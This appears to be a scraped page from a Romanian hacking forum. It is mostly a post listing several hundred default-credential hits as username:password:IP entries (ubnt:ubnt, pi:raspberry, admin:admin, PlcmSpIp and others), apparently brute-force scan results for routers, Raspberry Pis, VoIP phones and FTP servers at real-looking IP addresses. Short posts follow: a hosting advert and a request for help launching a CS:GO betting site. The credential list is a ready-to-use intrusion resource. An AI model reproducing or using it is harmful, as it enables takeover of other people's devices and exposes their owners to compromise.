ubnt:ubnt:24.117.7.191 ubnt:ubnt:24.117.99.59 ubnt:ubnt:24.107.55.228 ubnt:ubnt:24.121.37.49 ubnt:ubnt:73.202.52.105 ubnt:ubnt:24.121.87.254 ubnt:ubnt:24.112.165.109 ubnt:ubnt:24.111.64.90 ubnt:ubnt:24.125.160.224 ubnt:ubnt:24.115.37.190 ubnt:ubnt:24.125.124.53 pi:raspberry:24.132.107.46 ubnt:ubnt:24.130.103.176 ubnt:ubnt:24.136.8.81 ubnt:ubnt:24.134.109.131 ubnt:ubnt:24.13.69.254 pi:raspberry:73.37.90.41 ubnt:ubnt:24.115.98.102 ubnt:ubnt:24.137.224.128 ubnt:ubnt:24.123.146.190 ubnt:ubnt:24.138.155.167 ubnt:ubnt:24.143.162.247 ubnt:ubnt:24.137.174.45 ubnt:ubnt:24.144.20.38 ubnt:ubnt:24.148.22.11 ubnt:ubnt:24.143.5.187 ubnt:ubnt:24.140.98.70 ubnt:ubnt:24.143.114.122 ubnt:ubnt:24.139.83.85 ubnt:ubnt:24.157.191.182 ubnt:ubnt:24.144.17.178 pi:raspberry:24.130.11.101 ubnt:ubnt:24.136.157.155 ubnt:ubnt:24.16.80.209 ubnt:ubnt:24.165.28.192 ubnt:ubnt:24.165.56.216 pi:raspberry:24.163.115.214 ubnt:ubnt:24.166.51.249 ubnt:ubnt:24.170.165.5 ubnt:ubnt:24.173.116.214 ubnt:ubnt:24.178.197.202 ubnt:ubnt:24.176.168.227 ubnt:ubnt:24.179.147.105 ubnt:ubnt:24.180.138.5 ubnt:ubnt:24.18.103.174 ubnt:ubnt:24.181.245.131 ubnt:ubnt:24.189.84.67 ubnt:ubnt:24.189.2.11 PlcmSpIplcmSpIp:24.186.76.1 ubnt:ubnt:24.19.121.191 pi:raspberry:24.179.245.117 pi:raspberry:24.192.10.234 ubnt:ubnt:24.19.220.50 ubnt:ubnt:24.202.112.11 ubnt:ubnt:24.206.11.213 ubnt:ubnt:24.203.26.174 ubnt:ubnt:24.202.219.126 ubnt:ubnt:24.209.12.84 ubnt:ubnt:24.211.125.181 ubnt:ubnt:24.206.29.18 ubnt:ubnt:24.202.34.57 ubnt:ubnt:24.205.28.24 ubnt:ubnt:24.212.48.103 ubnt:ubnt:24.216.93.97 pi:raspberry:24.200.200.215 ubnt:ubnt:24.215.114.214 ubnt:ubnt:24.214.19.24 ubnt:ubnt:24.217.225.244 ubnt:ubnt:24.215.114.46 ubnt:ubnt:24.206.11.158 ubnt:ubnt:24.224.5.95 ubnt:ubnt:24.223.116.35 ubnt:ubnt:24.224.4.103 ubnt:ubnt:24.212.82.88 ubnt:ubnt:24.224.172.238 ubnt:ubnt:24.223.114.32 pi:raspberry:24.214.74.71 ubnt:ubnt:24.196.192.83 ubnt:ubnt:24.231.45.166 ubnt:ubnt:24.230.150.126 ubnt:ubnt:24.230.185.163 ubnt:ubnt:24.235.50.32 ubnt:ubnt:24.238.62.4 ubnt:ubnt:24.227.92.167 ubnt:ubnt:24.238.63.4 ubnt:ubnt:24.237.139.232 ubnt:ubnt:24.240.73.134 ubnt:ubnt:24.244.139.128 ubnt:ubnt:24.242.131.117 ubnt:ubnt:24.246.149.229 ubnt:ubnt:24.245.90.168 pi:raspberry:24.232.131.53 ubnt:ubnt:24.244.163.233 ubnt:ubnt:24.246.182.242 ubnt:ubnt:24.242.222.69 ubnt:ubnt:24.247.198.245 ubnt:ubnt:24.26.241.41 ubnt:ubnt:24.253.125.229 ubnt:ubnt:104.128.195.192 ubnt:ubnt:104.128.195.192 ubnt:ubnt:104.128.195.145 ubnt:ubnt:104.128.194.142 ubnt:ubnt:104.128.195.27 ubnt:ubnt:104.128.200.229 ubnt:ubnt:104.128.200.168 DUP tss:tss:65.116.86.111 DUP adminassword:65.116.86.111 adminefault:65.116.86.111 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.134.253.166 ubnt:ubnt:73.149.83.81 ubnt:ubnt:73.131.219.246 ubnt:ubnt:73.159.253.162 ubnt:ubnt:73.139.171.12 ubnt:ubnt:73.183.54.207 ubnt:ubnt:73.1.134.80 ubnt:ubnt:73.155.199.138 pi:raspberry:73.11.43.59 ubnt:ubnt:73.157.208.104 ubnt:ubnt:73.189.9.185 ubnt:ubnt:73.157.208.104 ubnt:ubnt:73.153.224.92 ubnt:ubnt:73.158.250.239 ubnt:ubnt:73.166.54.117 pi:raspberry:73.187.4.83 ubnt:ubnt:73.208.187.26 ubnt:ubnt:73.18.107.168 ubnt:ubnt:73.196.248.59 DUP PlcmSpIplcmSpIp:73.185.132.63 DUP pi:raspberry:73.185.132.63 ubnt:ubnt:73.192.68.238 ubnt:ubnt:73.25.178.190 ubnt:ubnt:73.210.232.131 ubnt:ubnt:73.207.161.62 pi:raspberry:73.3.91.162 ubnt:ubnt:73.4.20.53 ubnt:ubnt:73.237.0.24 ubnt:ubnt:73.49.40.102 pi:raspberry:73.223.174.200 ubnt:ubnt:73.54.122.222 ubnt:ubnt:73.52.172.53 ubnt:ubnt:73.223.134.170 pi:raspberry:73.183.4.235 ubnt:ubnt:73.42.216.185 ubnt:ubnt:24.10.183.246 ubnt:ubnt:73.222.111.208 ubnt:ubnt:73.34.53.217 ubnt:ubnt:24.107.201.24 ubnt:ubnt:24.107.124.235 ubnt:ubnt:73.39.226.80 pi:raspberry:73.21.71.254 ubnt:ubnt:24.111.38.7 ubnt:ubnt:24.113.38.195 ubnt:ubnt:24.113.38.194 ubnt:ubnt:24.117.189.72 pi:raspberry:73.37.90.41 pi:raspberry:73.187.192.84 ubnt:ubnt:24.117.7.191 ubnt:ubnt:24.121.37.49 ubnt:ubnt:24.107.55.228 ubnt:ubnt:24.117.99.59 ubnt:ubnt:24.118.83.216 ubnt:ubnt:24.121.87.254 ubnt:ubnt:24.112.165.109 ubnt:ubnt:73.206.69.194 ubnt:ubnt:24.115.98.102 ubnt:ubnt:73.202.52.105 ubnt:ubnt:24.111.64.90 ubnt:ubnt:24.125.160.224 ubnt:ubnt:24.1.123.94 ubnt:ubnt:24.125.124.53 ubnt:ubnt:24.115.37.190 ubnt:ubnt:24.102.233.173 ubnt:ubnt:24.130.103.176 ubnt:ubnt:24.136.157.155 pi:raspberry:24.132.107.46 ubnt:ubnt:24.134.109.131 ubnt:ubnt:24.13.69.254 ubnt:ubnt:24.137.224.128 ubnt:ubnt:24.138.155.167 ubnt:ubnt:24.140.98.70 ubnt:ubnt:24.143.162.247 ubnt:ubnt:24.144.20.38 ubnt:ubnt:24.148.22.11 ubnt:ubnt:24.143.5.187 ubnt:ubnt:24.144.17.178 ubnt:ubnt:24.123.146.190 ubnt:ubnt:24.137.174.45 ubnt:ubnt:24.153.104.35 ubnt:ubnt:24.139.83.85 ubnt:ubnt:24.143.114.122 ubnt:ubnt:24.157.191.182 ubnt:ubnt:24.16.80.209 pi:raspberry:24.130.11.101 pi:raspberry:73.222.19.109 ubnt:ubnt:24.165.28.192 ubnt:ubnt:24.165.56.216 ubnt:ubnt:24.166.51.249 ubnt:ubnt:24.170.165.5 ubnt:ubnt:24.173.116.214 ubnt:ubnt:24.178.197.202 ubnt:ubnt:24.179.147.105 ubnt:ubnt:24.180.138.5 ubnt:ubnt:24.18.103.174 ubnt:ubnt:24.181.245.131 ubnt:ubnt:24.189.2.11 ubnt:ubnt:24.189.84.67 pi:raspberry:24.179.245.117 ubnt:ubnt:24.19.121.191 pi:raspberry:24.192.10.234 ubnt:ubnt:24.19.220.50 ubnt:ubnt:24.202.219.126 ubnt:ubnt:24.202.34.57 ubnt:ubnt:24.206.11.213 ubnt:ubnt:24.202.112.11 ubnt:ubnt:24.203.26.174 ubnt:ubnt:24.205.28.24 ubnt:ubnt:24.206.11.158 ubnt:ubnt:24.212.82.88 ubnt:ubnt:24.212.48.103 ubnt:ubnt:24.206.29.18 ubnt:ubnt:24.211.125.181 pi:raspberry:24.200.200.215 ubnt:ubnt:24.215.114.214 ubnt:ubnt:24.216.93.97 ubnt:ubnt:24.217.225.244 ubnt:ubnt:24.224.5.95 ubnt:ubnt:24.224.4.103 ubnt:ubnt:24.223.114.32 ubnt:ubnt:24.223.116.35 ubnt:ubnt:24.224.172.238 pi:raspberry:24.214.74.71 ubnt:ubnt:24.230.185.163 ubnt:ubnt:24.231.45.166 ubnt:ubnt:24.235.50.32 ubnt:ubnt:24.238.63.4 ubnt:ubnt:24.238.62.4 ubnt:ubnt:24.237.139.232 ubnt:ubnt:24.240.73.134 ubnt:ubnt:24.242.222.69 ubnt:ubnt:24.242.131.117 ubnt:ubnt:24.245.90.168 ubnt:ubnt:24.246.182.242 ubnt:ubnt:24.246.149.229 pi:raspberry:24.232.131.53 ubnt:ubnt:24.244.139.128 ubnt:ubnt:24.244.163.233 ubnt:ubnt:24.247.198.245 ubnt:ubnt:24.26.241.41 ubnt:ubnt:24.253.125.229 ubnt:ubnt:68.103.53.226 ubnt:ubnt:68.1.76.254 ubnt:ubnt:68.105.153.153 ubnt:ubnt:68.11.80.33 ubnt:ubnt:68.108.126.212 ubnt:ubnt:68.118.100.47 ubnt:ubnt:68.108.250.133 ubnt:ubnt:68.113.18.54 ubnt:ubnt:68.111.229.165 pi:raspberry:68.115.126.102 pi:raspberry:68.100.58.19 ubnt:ubnt:68.119.232.176 ubnt:ubnt:68.105.210.63 pi:raspberry:68.115.34.204 ubnt:ubnt:68.171.67.91 ubnt:ubnt:68.119.32.221 pi:raspberry:68.104.219.84 ubnt:ubnt:68.185.182.250 ubnt:ubnt:68.184.161.253 ubnt:ubnt:68.187.240.133 ubnt:ubnt:68.183.39.13 ubnt:ubnt:68.186.20.220 ubnt:ubnt:68.189.108.187 ubnt:ubnt:68.189.72.8 ubnt:ubnt:68.188.212.79 ubnt:ubnt:68.206.161.38 ubnt:ubnt:68.206.139.79 ubnt:ubnt:68.205.144.115 pi:raspberry:68.193.146.64 ubnt:ubnt:68.186.64.126 ubnt:ubnt:68.196.139.103 ubnt:ubnt:68.195.8.39 ubnt:ubnt:68.196.167.95 pi:raspberry:68.196.127.48 ubnt:ubnt:68.224.218.189 ubnt:ubnt:68.225.255.216 ubnt:ubnt:68.226.248.19 ubnt:ubnt:68.228.158.205 ubnt:ubnt:68.234.213.230 ubnt:ubnt:68.231.199.2 ubnt:ubnt:68.226.211.232 ubnt:ubnt:68.183.23.180 pi:raspberry:68.234.134.226 ubnt:ubnt:68.228.70.235 ubnt:ubnt:68.235.77.77 ubnt:ubnt:68.229.132.246 pi:raspberry:68.236.123.11 ubnt:ubnt:96.18.160.245 ubnt:ubnt:96.244.254.53 ubnt:ubnt:96.232.96.58 ubnt:ubnt:96.254.165.200 ubnt:ubnt:96.28.152.6 user:user:24.111.203.187 user:user:24.111.200.66 user:user:24.108.63.140 user:user:24.111.205.179 user:user:24.111.218.36 user:user:24.111.164.160 ftpuser:asteriskftp:24.118.83.216 admin:admin:24.114.222.53 admin:admin:24.123.208.82 admin:admin:24.121.26.243 user:user:24.111.218.164
    1 point
  20. Domenii .com & .net la numai 0.29Euro / primul an https://www.hostalia.com/
    -1 points
  21. Buna seara ! Va rog sa ma scuzati daca nu am postat unde trebuie dar sunt nou pe acest forum. Dupa cum spune si titlul caut si eu pe cineva care ma poate ajuta sa fac un Site de Betting Cs:Go . Eu am urmatoarele : 2 domenii .com Vps Si niste scripturi (Ruleta/jackpot/Coinflip mai multe) Si am nevoie de cineva cu exprienta sa ma ajuta sa il pun pe picioare. Cel care ma ajuta o sa primeasca Iteme/Credite(pe site)/Sau bani (paypal) dupa ce imi vin ceva jucatori sa strang niste bani sa ii dau respectivei persoane. Multumesc anticipat!
    -2 points
×
×
  • Create New...